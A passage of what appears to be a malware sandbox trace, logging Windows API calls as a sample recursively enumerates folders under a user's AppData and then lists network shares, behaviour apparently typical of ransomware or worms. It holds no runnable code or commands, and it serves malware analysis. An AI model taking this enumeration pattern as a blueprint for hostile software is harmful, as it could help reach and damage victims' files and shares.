HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.644] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.644] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.644] PathFindFileNameW (pszPath="") returned="" [0246.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.645] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.645] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.645] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.645] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.645] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\") returned="itl\\" [0246.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.646] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.646] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.646] PathFindFileNameW (pszPath="") returned="" [0246.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.646] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.646] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.646] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.646] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.646] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.646] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\") returned="nrw\\" [0246.646] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.646] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.646] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.646] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.647] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.647] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.647] PathFindFileNameW (pszPath="") returned="" [0246.647] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.647] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.647] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.647] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.647] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.647] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\") returned="prt\\" [0246.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.648] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.648] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.648] PathFindFileNameW (pszPath="") returned="" [0246.648] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.648] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.648] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.648] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.649] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.649] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.649] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\") returned="spn\\" [0246.649] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.649] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.649] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.649] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.649] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.649] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.649] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.649] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.649] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.649] PathFindFileNameW (pszPath="") returned="" [0246.649] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.649] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.650] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.650] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.650] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.650] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\") returned="swd\\" [0246.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.650] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.650] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.650] PathFindFileNameW (pszPath="") returned="" [0246.650] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.651] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.651] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.651] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.651] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.651] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.651] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\") returned="si\\" [0246.651] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0246.651] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0246.651] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0246.651] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0246.651] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.651] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.651] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.651] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.651] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.651] PathFindFileNameW (pszPath="") returned="" [0246.651] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.652] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.652] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.652] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.652] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.652] SendMessageW (hWnd=0x30152, Msg=0x8003, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 149 os_tid = 0x548 [0226.670] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x3b6fee0 | out: lphEnum=0x3b6fee0*=0x33f0388) returned 0x0 [0227.210] WNetEnumResourceW (in: hEnum=0x33f0388, lpcCount=0x3b6fedc, lpBuffer=0x3b70048, lpBufferSize=0x3b6fed8 | out: lpcCount=0x3b6fedc, lpBuffer=0x3b70048, lpBufferSize=0x3b6fed8) returned 0x0 [0227.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7908 [0227.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7950 [0227.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0227.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7998 [0227.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d79e0 [0227.210] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3b70048, lphEnum=0x3b6fe28 | out: lphEnum=0x3b6fe28*=0x642c20) returned 0x0 [0227.221] WNetEnumResourceW (in: hEnum=0x642c20, lpcCount=0x3b6fe24, lpBuffer=0x3b74050, lpBufferSize=0x3b6fe20 | out: lpcCount=0x3b6fe24, lpBuffer=0x3b74050, lpBufferSize=0x3b6fe20) returned 0x103 [0227.221] WNetCloseEnum (hEnum=0x642c20) returned 0x0 [0227.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7950 | out: hHeap=0x620000) returned 1 [0227.221] HeapFree (in: 